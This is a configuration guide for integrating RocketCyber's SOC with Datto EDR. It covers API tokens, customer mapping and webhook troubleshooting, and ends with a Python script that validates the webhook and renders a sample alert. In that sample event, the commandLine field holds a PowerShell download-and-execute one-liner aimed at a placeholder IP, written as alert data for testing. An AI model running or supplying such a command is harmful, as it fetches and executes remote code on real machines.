Configuring the RocketCyber - EDR integration
NAVIGATION > Admin > Users & Tokens > API Tokens
SECURITY Datto EDR subscription with administrator-level platform access
SECURITY Provider-level access to RocketCyber
RocketCyber Managed Security Operations Center (SOC) provides a 24/7 team of security analysts that detect and respond to threats across endpoints, networks, and cloud attack vectors, enabling IT professionals to cut through the noise and focus on critical issues that need remediating. Round-the-clock monitoring eliminates the need to recruit and staff highly-compensated cyber engineers to detect, triage, and examine the mountains of threat data from various point solutions. Skilled SOC analysts escalate only critical action items. RocketCyber’s automated remediation and isolation technologies provide guidance and apply remedies to quarantine a compromised endpoint on the network until it is vetted clean.
This article describes the steps to integrate RocketCyber with your EDR instance.
Prerequisites
To set up the RocketCyber integration, you'll need:
- Administrator-level permissions in both Datto EDR and RocketCyber.
- A webhook that sends critical alert information to the RocketCyber SOC (the integration generates this for you when you authenticate; see the procedure below).
- The base URL of your Datto EDR instance.
- An API token for dedicated use with RocketCyber.
Procedure
- Within the EDR platform, navigate to Admin > Users & Tokens > API Tokens.
- Create an API token for dedicated use with RocketCyber. Refer to Generating Datto EDR API tokens.
- Make a note of the API token you created and the base URL of your EDR instance. For example, if the URL of your instance is https://harknessindustries.infocyte.com, your base URL is harknessindustries.infocyte.com.
NOTE The API token expires one year after creation. You will need to refresh the token at least once a year to ensure continued integration.
- Proceed to RocketCyber configuration.
- From within your RocketCyber instance, navigate to Integrations > Endpoint Security > Datto EDR. The Datto EDR configuration tab will load.
- In the Enter your Datto Access Token field, input the API token you created in EDR.
- In the Enter your Datto EDR base URL field, input https:// followed by the base URL of your Datto EDR instance and /api. For example, if the base URL of your instance is harknessindustries.infocyte.com, the URL you should enter is https://harknessindustries.infocyte.com/api.
- Click Check Credentials, and then click the Authenticate button to validate the handshake between your RocketCyber and Datto EDR instances and retrieve your managed locations. After successful authentication, a webhook is generated within Datto EDR so that it can send telemetry to RocketCyber. Do not change this webhook's settings unless it did not generate correctly.
If you configured the integration but see no data coming across when an event is triggered in Datto EDR, verify that the webhook was created properly. Refer to Creating Datto EDR webhooks for further details.
- The customer mapping section will load, enabling you to map your Datto EDR sites and customers to RocketCyber. Perform any necessary mapping, then click Save Map.
IMPORTANT One site can be assigned to only one RocketCyber customer. In the standalone version of Datto EDR, ensure that each customer is contained within one site. For the Datto RMM integrated version, map each customer to their corresponding site, which will appear in the customer mapping section.
- Navigate to your RocketCyber dashboard. A new Datto EDR widget will be present. Click Review.
- Events generated by Datto EDR will now be visible to RocketCyber. The SOC will be able to monitor events and create incidents to help you stay on top of your alerts.
Troubleshooting
If you see events in Datto EDR, but they are not populating in RocketCyber, you can perform the following steps to ensure that the webhook generated correctly and that there are no errors being logged.
- Locate the webhook named RocketCyber-integration and select it.
- Ensure that every part of its configuration matches the following:
Method: POST
URL:
- If you are using app.rocketcyber.com (US instance): https://web-receiver-us.herokuapp.com/api/datto_edr
- If you are using eu.rocketcyber.com (EU instance): https://web-receiver-eu.herokuapp.com/api/datto_edr
Headers: Content-Type=application/json
Body: Paste the block below into the body to ensure that all fields are sent to RocketCyber.
{
  "targetId": "{{targetGroupId}}",
  "rmmSiteId": "{{rmmSiteId}}",
  "rmmAccountId": "{{rmmAccountId}}",
  "data": "{{data}}",
  "instance": "{{instance}}",
  "id": "{{id}}",
  "itemType": "{{type}}",
  "hostScanID": "{{hostScanId}}",
  "alertType": "{{sourceType}}",
  "name": "{{name}}",
  "commandLine": "{{commandLine}}",
  "threatName": "{{threatName}}",
  "threatScore": "{{threatScore}}",
  "threatWeight": "{{threatWeight}}",
  "hostName": "{{hostname}}",
  "flag": "{{flagName}}",
  "flagId": "{{flagId}}",
  "flagColor": "{{flagColor}}",
  "flagName": "{{flagName}}",
  "flagWeight": "{{flagWeight}}",
  "avScore": "{{avPositives}}/{{avTotal}}",
  "itemId": "{{itemId}}",
  "createdOn": "{{createdOn}}",
  "avScan": "{{hasAvScan}}",
  "description": "{{description}}",
  "sourceId": "{{sourceId}}",
  "severity": "{{severity}}",
  "sourceName": "{{sourceName}}",
  "link": "{{link}}",
  "scanId": "{{scanId}}",
  "fileRepId": "{{fileRepId}}",
  "signed": "{{signed}}",
  "managed": "{{managed}}",
  "avPositives": "{{avPositives}}",
  "avTotal": "{{avTotal}}",
  "hasAvScan": "{{hasAvScan}}",
  "synapse": "{{synapse}}",
  "staticAnalysis": "{{staticAnalysis}}",
  "suspicious": "{{suspicious}}",
  "whitelist": "{{whitelist}}",
  "blacklist": "{{blacklist}}",
  "localWhitelist": "{{localWhitelist}}",
  "localBlacklist": "{{localBlacklist}}",
  "unknown": "{{unknown}}",
  "notMalicious": "{{notMalicious}}"
}
- If the webhook appears to be configured correctly but you are still not receiving events from Datto EDR, click the tri-dot menu to the right of the webhook and select View Errors to see whether any communication errors have been logged.
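As an added example (not Datto's or RocketCyber's own code), the following Python script checks a webhook definition against the settings listed above and then renders the body template against a constructed sample event, so you can see the JSON the RocketCyber receiver would get. The receiver URLs, method, header and body template are the ones documented in this article; the sample event values, the assumption that every placeholder value is rendered as a quoted string, and the JSON-escaping of substituted values are this example's own, since the article does not describe how Datto EDR fills the template.

```python
"""Check a Datto EDR webhook against the RocketCyber-integration settings and
dry-run its body template.  Added example, not Datto's or RocketCyber's code.
Receiver URLs, method, header and body template come from the article; the
sample event and the escaping of substituted values are assumptions."""
import json
import re

# Documented receiver URL for each RocketCyber region.
RECEIVERS = {
    "us": "https://web-receiver-us.herokuapp.com/api/datto_edr",
    "eu": "https://web-receiver-eu.herokuapp.com/api/datto_edr",
}

# Body template from the article, split across lines for readability.
BODY_TEMPLATE = (
    '{ "targetId": "{{targetGroupId}}", "rmmSiteId": "{{rmmSiteId}}", "rmmAccountId": "{{rmmAccountId}}", '
    '"data": "{{data}}", "instance": "{{instance}}", "id": "{{id}}", "itemType": "{{type}}", '
    '"hostScanID": "{{hostScanId}}", "alertType": "{{sourceType}}", "name": "{{name}}", '
    '"commandLine": "{{commandLine}}", "threatName": "{{threatName}}", "threatScore": "{{threatScore}}", '
    '"threatWeight": "{{threatWeight}}", "hostName": "{{hostname}}", "flag": "{{flagName}}", '
    '"flagId": "{{flagId}}", "flagColor": "{{flagColor}}", "flagName": "{{flagName}}", '
    '"flagWeight": "{{flagWeight}}", "avScore": "{{avPositives}}/{{avTotal}}", "itemId": "{{itemId}}", '
    '"createdOn": "{{createdOn}}", "avScan": "{{hasAvScan}}", "description": "{{description}}", '
    '"sourceId": "{{sourceId}}", "severity": "{{severity}}", "sourceName": "{{sourceName}}", '
    '"link": "{{link}}", "scanId": "{{scanId}}", "fileRepId": "{{fileRepId}}", "signed": "{{signed}}", '
    '"managed": "{{managed}}", "avPositives": "{{avPositives}}", "avTotal": "{{avTotal}}", '
    '"hasAvScan": "{{hasAvScan}}", "synapse": "{{synapse}}", "staticAnalysis": "{{staticAnalysis}}", '
    '"suspicious": "{{suspicious}}", "whitelist": "{{whitelist}}", "blacklist": "{{blacklist}}", '
    '"localWhitelist": "{{localWhitelist}}", "localBlacklist": "{{localBlacklist}}", '
    '"unknown": "{{unknown}}", "notMalicious": "{{notMalicious}}" }'
)

PLACEHOLDER = re.compile(r"\{\{(\w+)\}\}")  # {{name}} markers used by the template
EXPECTED_PLACEHOLDERS = frozenset(PLACEHOLDER.findall(BODY_TEMPLATE))

# The webhook as the article says it should look for a US-region RocketCyber tenant.
GOOD_CONFIG = {
    "method": "POST",
    "url": RECEIVERS["us"],
    "headers": {"Content-Type": "application/json"},
    "body": BODY_TEMPLATE,
}

# Constructed sample event (hypothetical values); keys follow the placeholder names.
SAMPLE_EVENT = {
    "targetGroupId": "tg-0001", "rmmSiteId": "site-42", "rmmAccountId": "acct-7",
    "instance": "harknessindustries", "id": "evt-1001", "type": "process",
    "hostScanId": "scan-9", "sourceType": "alert", "name": "powershell.exe",
    "commandLine": 'powershell.exe -nop -w hidden -c "IEX (New-Object '
                   "Net.WebClient).DownloadString('http://203.0.113.5/a')\"",
    "threatName": "Suspicious PowerShell", "threatScore": 9, "threatWeight": 0.9,
    "hostname": "WS-FINANCE-01", "flagName": "Malicious", "flagId": "f-1",
    "flagColor": "red", "flagWeight": 10, "avPositives": 12, "avTotal": 60,
    "itemId": "item-77", "createdOn": "2024-05-01T10:15:00Z", "hasAvScan": True,
    "severity": "critical", "sourceName": "Datto EDR",
    "link": "https://harknessindustries.infocyte.com/alerts/evt-1001",
}


def validate_webhook(config, region):
    """Return the list of ways `config` differs from the documented settings
    for `region` ("us" or "eu"); an empty list means it matches."""
    problems = []
    if str(config.get("method", "")).upper() != "POST":
        problems.append(f"method is {config.get('method')!r}, expected 'POST'")
    expected_url = RECEIVERS[region]
    if config.get("url") != expected_url:
        problems.append(f"url is {config.get('url')!r}, expected {expected_url!r}")
    headers = {k.lower(): v for k, v in config.get("headers", {}).items()}
    if headers.get("content-type") != "application/json":
        problems.append("Content-Type header is not application/json")
    body = config.get("body", "")
    # Every placeholder sits inside quotes in the documented template, so
    # replacing each with a dummy value must leave valid JSON behind.
    try:
        json.loads(PLACEHOLDER.sub("x", body))
    except json.JSONDecodeError as exc:
        problems.append(f"body is not valid JSON once placeholders are filled: {exc}")
    missing = EXPECTED_PLACEHOLDERS - set(PLACEHOLDER.findall(body))
    if missing:
        problems.append("body is missing placeholders: " + ", ".join(sorted(missing)))
    return problems


def render_body(template, event):
    """Fill the template from an event dict.  Each value is JSON-escaped before
    substitution (this example's choice, not a claim about how EDR renders) so
    quotes or backslashes in fields such as commandLine cannot break the payload.
    Placeholders absent from the event render as empty strings."""
    def fill(match):
        value = event.get(match.group(1), "")
        return json.dumps(str(value))[1:-1]  # escape, then drop the outer quotes
    return PLACEHOLDER.sub(fill, template)


def render_payload(template, event):
    """The rendered body parsed back into a dict, i.e. what the receiver sees."""
    return json.loads(render_body(template, event))


if __name__ == "__main__":
    for cfg in (GOOD_CONFIG, dict(GOOD_CONFIG, method="GET", url=RECEIVERS["eu"])):
        print(validate_webhook(cfg, "us") or "matches documented settings")
    print(json.dumps(render_payload(BODY_TEMPLATE, SAMPLE_EVENT), indent=2))
```

To use it against your own webhook, copy the method, URL, headers and body from the RocketCyber-integration webhook in Datto EDR into `GOOD_CONFIG` (or a second dict) and pass the region of your RocketCyber tenant; any non-empty list from `validate_webhook` names the setting that differs from the article. The rendered payload also shows why the template quotes every value: a command line containing double quotes only survives the round trip because the substituted value is escaped.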